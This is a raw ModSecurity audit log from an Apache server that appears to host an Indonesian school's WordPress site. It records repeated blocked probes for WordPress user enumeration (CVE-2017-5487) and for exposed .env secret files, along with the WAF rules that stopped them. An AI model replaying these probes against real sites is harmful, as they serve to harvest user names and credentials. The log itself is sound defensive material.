"WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748003208067791 2430 (- - -) Stopwatch2: 1748003208067791 2430; combined=1225, p1=379, p2=817, p3=0, p4=0, p5=28, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6116dc34-Z-- --44d95d02-A-- [23/May/2025:20:20:22 +0700] aDB2Fh67_KloOut96Ek_7QAAAIQ 103.236.140.4 38554 103.236.140.4 8181 --44d95d02-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 42.114.72.83 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 42.114.72.83 X-Forwarded-Proto: http Connection: close Accept: */* User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 --44d95d02-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --44d95d02-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748006422755308 902 (- - -) Stopwatch2: 1748006422755308 902; combined=386, p1=342, p2=0, p3=0, p4=0, p5=44, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --44d95d02-Z-- --1b5fed3a-A-- [23/May/2025:20:29:43 +0700] aDB4R2_WNRyhaqaKDLxsoAAAAMA 103.236.140.4 58662 103.236.140.4 8181 --1b5fed3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 103.133.6.13 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.133.6.13 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1b5fed3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b5fed3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748006983680039 1971 (- - -) Stopwatch2: 1748006983680039 1971; combined=1028, p1=344, p2=660, p3=0, p4=0, p5=23, sr=82, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b5fed3a-Z-- --c7dd7953-A-- [23/May/2025:21:06:19 +0700] aDCA2x67_KloOut96El8gQAAAI4 103.236.140.4 58712 103.236.140.4 8181 --c7dd7953-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 177.184.176.179 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 177.184.176.179 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --c7dd7953-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c7dd7953-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748009179074903 3199 (- - -) Stopwatch2: 1748009179074903 3199; combined=1759, p1=536, p2=1193, p3=0, p4=0, p5=30, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c7dd7953-Z-- --d63e194d-A-- [23/May/2025:21:06:52 +0700] aDCA_G_WNRyhaqaKDLypHwAAANY 103.236.140.4 32904 103.236.140.4 8181 --d63e194d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 45.229.68.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.229.68.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d63e194d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d63e194d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748009212520301 3338 (- - -) Stopwatch2: 1748009212520301 3338; combined=1756, p1=539, p2=1187, p3=0, p4=0, p5=30, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d63e194d-Z-- --3c5af55a-A-- [23/May/2025:21:52:24 +0700] aDCLqG_WNRyhaqaKDLztfwAAAMU 103.236.140.4 39294 103.236.140.4 8181 --3c5af55a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.23.93.4 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.23.93.4 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3c5af55a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3c5af55a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748011944044731 2982 (- - -) Stopwatch2: 1748011944044731 2982; combined=1375, p1=457, p2=883, p3=0, p4=0, p5=35, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3c5af55a-Z-- --7dca065f-A-- [23/May/2025:21:58:17 +0700] aDCNCR67_KloOut96EnJwAAAAIo 103.236.140.4 35810 103.236.140.4 8181 --7dca065f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.151.146 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.151.146 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --7dca065f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7dca065f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748012297750205 3275 (- - -) Stopwatch2: 1748012297750205 3275; combined=1663, p1=507, p2=1127, p3=0, p4=0, p5=29, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7dca065f-Z-- --444d5a7d-A-- [23/May/2025:22:06:23 +0700] aDCO71YzwfxII7zMfyEoVQAAABQ 103.236.140.4 42514 103.236.140.4 8181 --444d5a7d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.117.209 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.117.209 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; FreeBSD amd64; rv:54.0) Gecko/20100101 Firefox/54.0 Accept-Charset: utf-8 --444d5a7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --444d5a7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748012783783989 733 (- - -) Stopwatch2: 1748012783783989 733; combined=304, p1=255, p2=0, p3=0, p4=0, p5=49, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --444d5a7d-Z-- --1dd5be7a-A-- [23/May/2025:23:08:09 +0700] aDCdaR67_KloOut96EkjJwAAAIM 103.236.140.4 59892 103.236.140.4 8181 --1dd5be7a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 92.205.19.142 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 92.205.19.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1dd5be7a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1dd5be7a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748016489444454 2044 (- - -) Stopwatch2: 1748016489444454 2044; combined=1088, p1=352, p2=705, p3=0, p4=0, p5=31, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1dd5be7a-Z-- --8e460d3a-A-- [23/May/2025:23:29:00 +0700] aDCiTG_WNRyhaqaKDLxzFAAAANU 103.236.140.4 48030 103.236.140.4 8181 --8e460d3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 65.20.144.226 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 65.20.144.226 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --8e460d3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e460d3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748017740710834 2305 (- - -) Stopwatch2: 1748017740710834 2305; combined=1172, p1=386, p2=758, p3=0, p4=0, p5=28, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8e460d3a-Z-- --561c081d-A-- [23/May/2025:23:43:23 +0700] aDClq1YzwfxII7zMfyGBpwAAABI 103.236.140.4 50422 103.236.140.4 8181 --561c081d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 41.242.57.139 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 41.242.57.139 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --561c081d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --561c081d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748018603026008 2969 (- - -) Stopwatch2: 1748018603026008 2969; combined=1432, p1=490, p2=915, p3=0, p4=0, p5=27, sr=53, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --561c081d-Z-- --9aea287a-A-- [23/May/2025:23:47:11 +0700] aDCmj2_WNRyhaqaKDLyG0wAAAMY 103.236.140.4 58526 103.236.140.4 8181 --9aea287a-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --9aea287a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9aea287a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748018831557358 793 (- - -) Stopwatch2: 1748018831557358 793; combined=295, p1=261, p2=0, p3=0, p4=0, p5=33, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9aea287a-Z-- --d09ac765-A-- [24/May/2025:00:10:14 +0700] aDCr9m_WNRyhaqaKDLyeqgAAAMM 103.236.140.4 50926 103.236.140.4 8181 --d09ac765-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 119.76.189.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 119.76.189.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d09ac765-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d09ac765-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748020214116457 25073 (- - -) Stopwatch2: 1748020214116457 25073; combined=1819, p1=533, p2=1250, p3=0, p4=0, p5=34, sr=66, sw=2, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d09ac765-Z-- --93b68879-A-- [24/May/2025:01:01:45 +0700] aDC4CR67_KloOut96EmjegAAAIY 103.236.140.4 43194 103.236.140.4 8181 --93b68879-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.95.130.93 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.95.130.93 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --93b68879-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93b68879-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748023305000485 3376 (- - -) Stopwatch2: 1748023305000485 3376; combined=1566, p1=467, p2=1066, p3=0, p4=0, p5=33, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93b68879-Z-- --5308c137-A-- [24/May/2025:01:26:27 +0700] aDC907z70bfNdlplZZN30AAAAE4 103.236.140.4 41088 103.236.140.4 8181 --5308c137-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.102.236.236 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.102.236.236 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --5308c137-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5308c137-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748024787317596 2245 (- - -) Stopwatch2: 1748024787317596 2245; combined=965, p1=333, p2=608, p3=0, p4=0, p5=24, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5308c137-Z-- --be41592e-A-- [24/May/2025:01:40:19 +0700] aDDBE2_WNRyhaqaKDLwJhAAAAME 103.236.140.4 42242 103.236.140.4 8181 --be41592e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 220.158.233.221 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 220.158.233.221 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --be41592e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --be41592e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748025619283923 4311 (- - -) Stopwatch2: 1748025619283923 4311; combined=2196, p1=651, p2=1512, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --be41592e-Z-- --471cf603-A-- [24/May/2025:01:41:46 +0700] aDDBarz70bfNdlplZZOLCgAAAE0 103.236.140.4 45318 103.236.140.4 8181 --471cf603-B-- GET /.env.production HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --471cf603-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --471cf603-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706523548 924 (- - -) Stopwatch2: 1748025706523548 924; combined=351, p1=314, p2=0, p3=0, p4=0, p5=37, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --471cf603-Z-- --e3f6db54-A-- [24/May/2025:01:41:46 +0700] aDDBam_WNRyhaqaKDLwKwwAAANI 103.236.140.4 45320 103.236.140.4 8181 --e3f6db54-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 193.233.74.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 193.233.74.105 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --e3f6db54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3f6db54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748025706524284 808 (- - -) Stopwatch2: 1748025706524284 808; combined=303, p1=269, p2=0, p3=0, p4=0, p5=34, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
